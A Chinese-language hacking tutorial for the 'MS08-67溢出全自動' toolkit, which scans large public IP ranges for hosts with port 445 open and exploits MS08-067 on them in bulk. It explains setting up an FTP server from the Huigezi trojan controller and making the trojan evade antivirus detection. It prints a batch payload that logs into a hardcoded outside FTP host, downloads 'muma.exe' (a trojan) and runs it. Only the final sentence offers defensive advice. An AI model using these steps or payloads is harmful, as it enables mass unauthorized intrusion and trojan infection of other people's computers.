壹、MS08-67溢出全自動
如果不懂CMD命令提示符窗口,不熟悉各種命令操作,那是不行的。CMD命令提示符窗口下的各種批處理命令,有時可以幫我們方便的完成各種復雜的手工操作。“MS08-67溢出全自動”就是壹個利用批處理,實現自動化掃描漏洞主機、溢出與上傳運行木馬的工具。可以對上萬個IP地址進行自動化掃描溢出攻擊!
1.設置IP段
下載“MS08-67溢出全自動”工具,解壓後打開其中的“TXT”和“TXT2”文件夾,在其中***有八個IP文件,分別名為“IP1.txt”、“IP2.txt”等。用記事本打開文件後,添加要掃描的地址段即可。每個文件中放壹段IP即可,而且IP地址段範圍不要太長,否則成功率不高,壹般壹段中包含5萬個IP地址就夠了。
2.設置上傳服務器
用記事本打開“down2.txt”文件後,可以看到這是壹段FTP自動上傳的批處理命令代碼。我們需要作的就是將其中的FTP服務器地址和登陸用戶名及密碼等修改,並保存修改後的文件。
很多木馬控制端程序都帶有FTP服務功能,例如在灰鴿子木馬中,打開FTP服務器工具窗口。設置FTP服務器的主目錄為本地主機硬盤上的任意路徑,設置“服務端口”為21,再設置壹個用戶名和密碼。設置完畢後,點擊“開啟服務”按鈕即可。註意自建FTP服務器時,必須有壹個公網IP地址,否則無法從Internet上連接FTP服務器下載運行木馬。
開啟FTP服務後,將“down2.txt”文件中的FTP服務器修改為自己的IP地址,並修改輸入剛才設置的FTP服務器用戶名及密碼即可。
3.設置服務端程序
先對木馬進行免殺等各種操作,並放在剛才設置為FTP服務器根目錄的文件夾路徑下。然後將“down2.txt”文件中的“妳要下載的文件abc.exe”修改為木馬文件名,並將另外的幾個“abc.exe”也改為木馬文件名,保存文件即可。最後修改好的“down2.txt”文件如下:
echoopen220.172.228.177>cc1.dat
echoxiaoyao>>cc1.dat
echoxiaoyao>>cc1.dat
echobinary>>cc1.dat
echogetmuma.exe>>cc1.dat
echobye>>cc1.dat
ftp-s:cc1.dat
muma.exe
delcc1.dat
muma.exe
exit
註意,最後壹個“exit”字符串後面,壹定要加上壹個回車符,這樣才能自動退出溢出上傳狀態。 4.批量溢出
現在可以開始進行批量溢出攻擊了。在“MS08-67溢出全自動”工具目錄下的有兩個批處理文件“win2k.BAT”和“xp.bat”,分別運行在Windows2000/2003系統和WindowsXP系統中。根據自己所使用的系統類型,雙擊相應的批處理文件,即可開始自動溢出。
溢出工具首先會掃描指定IP地址段中開放了445端口的主機,並保存漏洞主機IP地址,然後自動進行溢出上傳木馬攻擊。
二、MS08067批量溢出
運行批量溢出工具中的“445.exe”工具進行批量掃描。工具也是壹個命令行下的批處理程序,先選擇自己的系統類型,如果是WindowsXP主機,則按下數字“1”,使用TCP多線程掃描方式;如果是Windows2000/2003主機,則按下數字“2”,使用SYN掃描。
按下數字鍵後,自動打開“IP.txt”文件。該文件是用於設置要掃描的IP地址段,例如這裏選擇掃描“220.172.25.1-220.200.30.254”IP地址段,可以支持多行輸入掃描。設置IP地址段後,保存文件關閉記事本窗口。
返回溢出窗口中,按下任意鍵,即可開始自動進行漏洞主機掃描了。程序是調用S掃描器進行批量掃描的,掃描速度很快,掃描的結果會被保存在當前目錄下的“Result.txt”文件中。最後,程序會自動整理掃描結果,將所有開放了445端口的主機IP地址,將單獨保存為壹個名為“host.txt”的文件。
掃描完畢後,運行“yichu.exe”即可自動進行批量溢出。
針對MS08067溢出漏洞,筆者認為最好的方法就是安裝補丁,雖然說針對445端口封鎖也可以起到同樣效果,但對於很多應用環境來說還是比較麻煩。另外如果有必要,還可以用防火墻監聽壹下相應端口。